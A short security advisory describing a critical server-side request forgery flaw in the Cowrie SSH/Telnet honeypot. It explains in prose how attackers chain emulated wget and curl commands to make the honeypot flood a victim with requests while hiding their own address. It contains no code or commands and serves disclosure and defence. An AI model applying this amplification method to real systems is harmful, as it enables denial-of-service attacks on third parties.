Cowrie, Server-Side Request Forgery, Vulnerability (Critical)

Listen to this Post

The vulnerability operates within Cowrie’s default emulated shell mode, where it mimics common Linux commands for honeypot functionality. Commands like wget and curl are emulated to download files for analysis, requiring real outbound HTTP requests. Attackers connect via SSH or Telnet using default or compromised credentials. They can repeatedly invoke wget or curl commands targeting any external URL. Since no rate limiting existed, attackers craft payloads with numerous concatenated commands. These payloads are executed via SSH sessions, generating high-volume HTTP traffic. The requests originate from the honeypot’s IP address, not the attacker’s, providing anonymity. This allows the honeypot to be used as an unwitting amplification vector. Attackers can scale the attack by increasing command repetitions and sessions. The victim server receives excessive GET requests, potentially leading to denial-of-service. The honeypot’s network resources are consumed in the process. This SSRF flaw effectively turns a security tool into a DDoS participant. The vulnerability was actively exploited in real-world attacks prior to remediation.
